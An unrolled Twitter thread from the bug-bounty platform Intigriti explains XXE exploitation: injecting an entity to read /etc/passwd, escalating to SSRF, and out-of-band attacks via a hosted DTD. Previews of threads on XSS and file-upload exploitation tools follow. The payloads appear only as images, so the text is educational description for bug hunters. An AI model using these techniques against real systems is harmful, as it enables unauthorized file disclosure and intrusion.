Share this page!

Enter Twitter Thread URL to Unroll

Needs to be the full URL like: https://twitter.com/threadreaderapp/status/1644127596119195649

How to get URL link on Twitter App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
INTIGRITI Profile picture
@intigriti
Aug 11 9 tweets 3 min read Twitter logo Read on Twitter
Scrolly
XXE exploitation 👇️ Image
Today, we will cover how you can successfully exploit XXE vulnerabilities

If you aren't familiar with the concepts of XXE yet...

This thread is made just for you! 👇️
1⃣ Basic exploitation via XML Entities

Let's start off with the most basic example

A web app that queries the backend to retrieve your previously sent messages Image
To test if this feature is vulnerable to XXE, we could try and retrieve a local file

To do so, we'd have to add the XML entity definition ourselves: Image
Afterwards, include your entity in the field and send the request

The response should contain the contents of the local file "/etc/passwd" Image
But we can also take the same approach to request an internal or external resource and escalate this into an SSRF vulnerability! Image
2⃣ Exploitation via OOB technique

This exploitation technique involves us hosting a DTD file and referencing it in our payload

The XML parser will then parse our malicious XML data and retrieve the external DTD
That DTD file contains our payload

And just as before, we can send our request and retrieve the contents of a local file for example!
Image
Image
We hope you've learned something new from this thread on XXE exploitation:

If you have enjoyed this thread:
1. Follow us @INTIGRITI for more of these threads 🐛️
2. Retweet the first Tweet to share it with your friends 💙️

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with INTIGRITI

INTIGRITI Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @intigriti

INTIGRITI Profile picture
Jul 5
A lot happened in the #BugBounty community last week, so let's take a look at the 5 must consumes in todays #BugBytes
1⃣ We start out with a blog from @assetnote that you've definitely already seen as they dive into the recent Critrix CVE and talk about the how of finding it! blog.assetnote.io/2023/06/29/bin…
2⃣What does it take to actually run a CTF challenge? @_JohnHammond gives us a look into how on earth you get hundreds of hackers taking on a challenge and keep it up and running
Read 7 tweets
INTIGRITI Profile picture
Jun 29
You probably saw this before...

An XSS through your User-Agent header

But is it exploitable? 🤔️ Let's find out! 👇🧵
A common mistake new hunters make is reporting XSS where the payload is supplied inside a request header

However...this leads to a self-cross-site scripting vulnerability which is often out-of-scope! 😬️

Let's understand why and when you can actually report it!
Take a look at the following example

We can see that our User-Agent's value gets directly reflected in the response body without any validation done allowing us to inject our own tags! 👀️

Read 6 tweets
INTIGRITI Profile picture
Jun 6
Let's take a look at why this XSS won't execute 🤔

A thread 🧵👇 XSS - no execution
You probably came across this scenario before

Your payload gets reflected without getting encoded...

But non of the HTML entered is getting rendered!
Let's first understand why this happens!

XSS is only possible on certain content types that are executable

In other words, contain active or dynamic content such as HTML or XML
Read 8 tweets
INTIGRITI Profile picture
May 29
3 Tools to help you automate file upload vulnerabilities 📁🔨
1⃣Upload Scanner

Upload Scanner is a Burpsuite extension that can help you automate file upload vulnerabilities

It's capable of uploading various files, injecting ASP, JSP, and PHP code + bypassing restrictions!

portswigger.net/bappstore/b224…
2⃣Fuxploider

Fuxploider is a tool written in Python that helps you automate identifying and exploiting unrestricted file uploads!

It maps out all the allowed file types and extensions and exploits the file upload feature based on the data!

github.com/almandin/fuxpl…
Read 5 tweets
INTIGRITI Profile picture
May 19
An introduction to file upload vulnerabilities 🧵👇 Insecure File Upload Vulner...
Let's first understand file upload vulnerabilities!

File upload vulnerabilities arise when you are able to upload files without any restrictions (or validations performed on the backend) 💡
The uploaded file can later be requested and potentially trigger the execution of the file contents...

That execution can lead to complete system compromise 😮
Read 9 tweets
INTIGRITI Profile picture
May 17
Wondering what happened this week in #BugBounty and pentesting? Procrastinating on twitter and want to pretend to be productive? Let's check out this weeks #BugBytes
PS: did you notice that the write ups and tutorials are now separated? If you're looking for more advanced security research or grow your skills! A screenshot of the latest ...
1⃣@NahamSec talks about 2 months of bug hunting, the luck, approach and choosing a program and also burn out
Read 12 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

:(